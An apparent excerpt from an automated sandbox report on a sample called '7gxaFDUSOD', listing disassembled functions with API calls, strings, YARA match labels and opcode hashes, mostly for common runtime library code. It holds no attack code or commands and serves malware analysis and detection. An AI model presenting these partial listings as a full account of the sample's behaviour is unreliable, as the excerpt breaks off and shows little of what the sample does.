RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 0248286F
GetLastError.KERNEL32(?,?,?,?,02488830,?,?,?,?,00000000,?,00000000), ref: 0248287E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02482894
__CxxThrowException@8.LIBVCRUNTIME ref: 024828A2

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
String ID:
API String ID: 3803302727-0
Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction ID: 70a05af022c638a1edb475b4b130ff98d0fbfffb5b6052c80cb2eb65102ab050
Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction Fuzzy Hash: 45F0303550014ABBCF10FFA5CD45EAF37B86B00751F600656B915E61A0DB75D6049B64

Function 00412316 Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCreateEventExW.LIBCPMT ref: 0041232C
GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
__CxxThrowException@8.LIBVCRUNTIME ref: 0041235E

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
String ID:
API String ID: 200240550-0
Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction ID: 785b6ff49928477fe7b23022ebabbc79c69e7cefd8d4159d1ac4e3541b52c9d2
Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction Fuzzy Hash: 01E0D871A0021929E710B7768E03FBF369C6B00B49F54096ABE14E51D3FDACD65042AC

Function 0248257D Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCreateEventExW.LIBCPMT ref: 02482593
GetLastError.KERNEL32(?,?,?,?,?,02480DA0), ref: 024825A1
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024825B7
__CxxThrowException@8.LIBVCRUNTIME ref: 024825C5

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
String ID:
API String ID: 200240550-0
Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction ID: 452940a9c2cbff8c27988d2a34783926729a1d1a02ba9c90c1676f6da1e7dfaf
Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction Fuzzy Hash: 78E0D87165025539E710F77A4C12F7F36DC5B00B41F440956BD15E11C1FFD4D10049B8

Function 004192C9 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8

TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
GetLastError.KERNEL32 ref: 00423991
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
__CxxThrowException@8.LIBVCRUNTIME ref: 004239B5

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3735082963-0
Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D

Function 02489530 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02482959: TlsAlloc.KERNEL32(?,02480DA0), ref: 0248295F

TlsAlloc.KERNEL32(?,02480DA0), ref: 02493BE6
GetLastError.KERNEL32 ref: 02493BF8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02493C0E
__CxxThrowException@8.LIBVCRUNTIME ref: 02493C1C

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3735082963-0
Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction ID: c75cf1be0ba8b0ebd8faa3945242bf4a786f4bab695e1ced4cc2fe62c022bf4c
Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction Fuzzy Hash: 47E06834500202AFCB00FF779C49A7F3E686A023017100E6BE525D21A1EF34D0068EAC

Function 0041252D Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412537
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412546
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041256A

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction ID: 7399f334bae95f1f5dd7aa6ec606231f62b338b040d4ba0de61eab0e9ab47a66
Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction Fuzzy Hash: A1E0D87060010AABC700EBB5DE4AAEF73BC7A00605B600166A101E2151EA6CDA44877C

Function 02482794 Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02480DA0), ref: 0248279E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02480DA0), ref: 024827AD
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024827C3
__CxxThrowException@8.LIBVCRUNTIME ref: 024827D1

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction ID: 3a004793667cdad15ed708c278e2eb265b6b293adbb13b2d4906a12d889341ec
Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction Fuzzy Hash: B0E08074510149A7CB00FBB6DD45EAF77BC6A00B05B600566A541E3190EB64D7048B79

Function 00412685 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,?), ref: 00412691
GetLastError.KERNEL32 ref: 0041269D
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
__CxxThrowException@8.LIBVCRUNTIME ref: 004126C1

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
String ID:
API String ID: 4286982218-0
Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction Fuzzy Hash: 3CE04F34600119ABCB14BF619E06BAF376C7A00745B50052AB515D10A2EE79D564869C

Function 0041274B Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
__CxxThrowException@8.LIBVCRUNTIME ref: 00412787

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
String ID:
API String ID: 1964976909-0
Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction ID: 63a90eab5ccd82633b541feab557f5b3d99097aee930e3f4eaa44923ec20be65
Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction Fuzzy Hash: 43E04F34600119AADB10BF619E0AAAF37A87A00A45B50052AB915D10A2EE79D564869C

Function 024828EC Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,?), ref: 024828F8
GetLastError.KERNEL32 ref: 02482904
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0248291A
__CxxThrowException@8.LIBVCRUNTIME ref: 02482928

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
String ID:
API String ID: 4286982218-0
Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction ID: 6bdd722bb6f6267576dccc9c198659edf368ef9c4099716b17cf10c88709ef7f
Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction Fuzzy Hash: 19E086346101096BCB14FF76CC05BBF376C6B00745B500926BC55D20A0EF79D1048AAC

Function 024829B2 Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,00000000,02487BD8,00000000,?,?,02480DA0,?,?,?,00000000,?,00000000), ref: 024829BE
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 024829CA
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024829E0
__CxxThrowException@8.LIBVCRUNTIME ref: 024829EE

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
String ID:
API String ID: 1964976909-0
Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction ID: 777ef01c951a7e125f9b0e7ec1c04890caf91ed541871510d7ac9227cbf2b22f
Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction Fuzzy Hash: 04E086352101096BDB10FF75CC08BBF376C6F00745B500926BD59D10A0EF75D1149AAC

Function 004126F2 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
GetLastError.KERNEL32 ref: 00412705
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
__CxxThrowException@8.LIBVCRUNTIME ref: 00412729

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3103352999-0
Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction Fuzzy Hash: 2AE0CD34500115578714BB755D0AABF72587901719B600B1AF131D20D1FB6CD458429C

Function 02482959 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,02480DA0), ref: 0248295F
GetLastError.KERNEL32 ref: 0248296C
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02482982
__CxxThrowException@8.LIBVCRUNTIME ref: 02482990

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3103352999-0
Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction ID: e6ae053326569088123ac172e3d09ea79bb09a4af3f6f20b39d29d3f18cb0259
Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction Fuzzy Hash: 4FE02B301101456BC714FBBD9C4CB7F32AC6B01715BA00F2BF861E20E0EFA8D1084AAC

Function 0042F07D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0042F10D

Strings

pow, xrefs: 0042F0E5, 0042F102

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction ID: 9c0c3c151ae2a5a6b50f0fee57114a4457493f87fddc68121f24b850b116d2d7
Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction Fuzzy Hash: 8C515D61B04302D6DB117714E90137BABA0EB54B40FE4597FF491813E9EE3D8CAA9A4F

Function 0043AE69 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44

Strings

ACP, xrefs: 0043AE87
OCP, xrefs: 0043AEBD

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E

Function 024AB0D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,024AB32B,?,00000050,?,?,?,?,?), ref: 024AB1AB

Strings

OCP, xrefs: 024AB124
ACP, xrefs: 024AB0EE

Memory Dump Source

Source File: 00000000.00000002.3888004669.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_7gxaFDUSOD.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction ID: d996299ac57833f46d975cbf63b7a7074f7d35f5bbe6985b5cbf979b0331125b
Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction Fuzzy Hash: DD21B372B00105A6EB268F649D61BA7739AEF74BDCF4A8126E909DB304F732D941C390

Function 00401F0A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A

Strings

image/png, xrefs: 00401F58

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: EncodersGdipImage$Size
String ID: image/png
API String ID: 864223233-2966254431
Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58

Function 0040EF26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA

Strings

F(@, xrefs: 0040EF29

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ErrorLast
String ID: F(@
API String ID: 1452528299-2698495834
Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9

Function 0040C510 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 0040C554

Strings

F(@, xrefs: 0040C547
ios_base::failbit set, xrefs: 0040C510

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: F(@$ios_base::failbit set
API String ID: 4194217158-1828034088
Opcode ID: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
Opcode Fuzzy Hash: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC

Function 0044068A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00440691

Strings

MOC, xrefs: 004406B4
RCC, xrefs: 004406C3

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: H_prolog3_catch
String ID: MOC$RCC
API String ID: 3886170330-2084237596
Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE

Function 00404E07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C

Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE

std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50

Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0

Strings

F@, xrefs: 00404E48

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: F@
API String ID: 2118720939-885931407
Opcode ID: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
Opcode Fuzzy Hash: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89

Function 00428D77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D83
__CxxThrowException@8.LIBVCRUNTIME ref: 00428DAA

Part of subcall function 0042860D: RaiseException.KERNEL32(?,?,0040D87E,00000000,00000000,00000000,00000000,?,?,?,?,0040D87E,00000000,0045617C,00000000), ref: 0042866D

Strings

Access violation - no RTTI data!, xrefs: 00428D7A

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
String ID: Access violation - no RTTI data!
API String ID: 2053020834-2158758863
Opcode ID: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
Instruction ID: 6523df8e39b2e501409064d37ec9e65ca05e1b8799177bf407a1bfc54a05c872
Opcode Fuzzy Hash: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
Instruction Fuzzy Hash: 28E0DF726993185A9A04D6A1B846CDE73EC9E24300BA0001FF900920C2EE2DF918826D

Function 0042381B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E

Strings

zB, xrefs: 00423821
~B, xrefs: 00423827

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: ContextInternal$BaseBase::~Concurrency::details::
String ID: zB$~B
API String ID: 3275300208-395995950
Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC

Function 004212BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
__CxxThrowException@8.LIBVCRUNTIME ref: 004212E9

Strings

pThreadProxy, xrefs: 004212D3

Memory Dump Source

Source File: 00000000.00000002.3887397699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7gxaFDUSOD.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pThreadProxy
API String ID: 1687795959-3651400591
Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC

Function 0042AE8A Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
GetLastError.KERNEL32 ref: 0042AF2E
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89

Memory Dump Source

